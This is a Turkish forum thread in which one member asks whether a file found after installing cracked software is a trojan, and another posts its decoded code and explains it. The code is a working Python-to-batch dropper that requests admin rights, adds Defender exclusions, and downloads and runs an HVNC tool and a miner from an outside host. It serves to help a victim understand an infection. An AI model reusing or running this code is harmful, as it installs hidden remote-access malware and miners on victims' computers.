persius35 adlı üyeden alıntı:
mesajı görüntüle
Bu kod trojan mi
26
●1.460
- 11-06-2025, 12:10:57Üyeliği durdurulduBenim anlamadığım nokta o kod kendini nasıl çalıştırıyor bi kere çalıştırsa yeter mi yeterse sonradan kendini nasıl silmemis ve ben bazen crackli program indirebiliyorum oradan nasıl bulaşıyor, yani benim programı açınca bu fernetli kod kendini otomatik oraya kaydediyor ama kaydedince o py dosyası nasıl çalışıyor merak ettim şu an, internetten exe dosyalarını yani rat dosyalarını indiriyormus pcye, madem internetten indiriyorsa benim crackli programa niye gommemisler
- 11-06-2025, 12:15:32
import os def create_and_run_bat_script(): bat_script_content = ''' @echo off set "filePath=%appdata%\Microsoft\emptyfile20947.txt" :: BatchGotAdmin :------------------------------------- REM --> Check for permissions IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" ( >nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system" ) ELSE ( >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" ) REM --> If error flag set, we do not have admin. if '%errorlevel%' NEQ '0' ( echo Requesting administrative privileges... goto UACPrompt ) else ( goto gotAdmin ) :UACPrompt echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" set params= %* echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params:"=""%", "", "runas", 1 >> "%temp%\getadmin.vbs" "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" exit /B :gotAdmin pushd "%CD%" CD /D "%~dp0" :-------------------------------------- mkdir "C:\Windows\WinEmptyfold" powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'" powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.dll'" powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'exe'" powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'dll'" powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'" set "temp_file=%TEMP%\RuntimeBroker.exe" set "temp_file2=%TEMP%\RuntimeBroker2.exe" powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://kleinanzeigen.ru/hvnc.exe', '%temp_file%')" powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://kleinanzeigen.ru/miner.exe', '%temp_file2%')" start "" "%temp_file%" start "" "%temp_file2%" del /q "%appdata%\Microsoft\runpython.py" ''' temp_folder = os.environ.get('TEMP', '') if temp_folder: bat_script_path = os.path.join(temp_folder, 'temp_script.bat') with open(bat_script_path, 'w') as bat_file: bat_file.write(bat_script_content) os.system(bat_script_path) else: print("Failed to get the TEMP folder path.") if os.name == 'nt': folder_path = r"C:\Windows\WinEmptyfold" if os.path.exists(folder_path): exit() else: os.system('timeout 600') os.system('taskkill /f /im explorer.exe') create_and_run_bat_script() while True: os.system('timeout 5') if os.path.exists(folder_path): os.system('start explorer.exe') break else: create_and_run_bat_script()Decode edilmiş hali bu kodun. Kesinlikle zararlı bir yazılım. Saldırganın serverinden 2 tane dosya indirip çalıştırıyor. Birisi mining yazılımı sanırım. Diğeri de ne olduğu belli değil.
Defender yakalamamış olabilir. Ama çalıştırmayı denersen çok yüksek ihtimalle yakalar. - 11-06-2025, 12:17:11Üyeliği durdurulduHocam dosya kendi halinde duruyormuş işte ben nasıl kendiliğinden çalıştı oni merak ettimbircan adlı üyeden alıntı: mesajı görüntüle
- 11-06-2025, 12:19:16Kendi kendine çalışmaz. Çalışması için senin tetiklemen gerekiyor. Mesela indirdiğin başka bir oyun, script, uygulama vb şeyler bunu çalıştırıyor olabilir arkada.Vivobayim adlı üyeden alıntı: mesajı görüntüle
- 11-06-2025, 12:26:33Üyeliği durdurulduMesela hocam crackli adobe indirdim, exe çalıştığında bu py yi otomatik windows appdataya mi kaydediyor ve otomatik çalıştırıyor o zararlı exeleri indiriyor yani. Zararlı exeleri pyden indiriyor. Cunku benim açtığım exe zararlı olsa pc uyarı verirbircan adlı üyeden alıntı: mesajı görüntüle
- 11-06-2025, 12:34:53Muhtemelen böyle. Ama bu örnek için konuşacak olursak çok amatör bir zararlı diyebilirim. Defender bu arada gayet iyi bir yazılım. Özellikle runtime da, yani çalıştırdıktan sonraki aktiviteleri çok iyi takip ediyor.Vivobayim adlı üyeden alıntı: mesajı görüntüle
Zararlı olabilecek bir aktivite, api kullanımı durumunda direkt karantinaya alıyor. Bu zararlı yazılım bence defenderi geçemez.
Fakat, hiçbir antivirüsün yakalayamadığı çok daha profesyonel zararlılar var ortada. Bunlardan birine denk gelirseniz farketmeniz imkansız. - 11-06-2025, 12:39:29Üyeliği durdurulduBenim windows defenderi geçmiş ama hocam kasperskyla tarama yapmasam defenderin dünyadan haberi yok uyarı vermedi hiçbircan adlı üyeden alıntı: mesajı görüntüle
Windows 11 bi de kullandığım sistem - 11-06-2025, 12:41:29Static taramada geçebilir de, çalıştırıldığında geçmiş mi mesela?Vivobayim adlı üyeden alıntı: mesajı görüntüle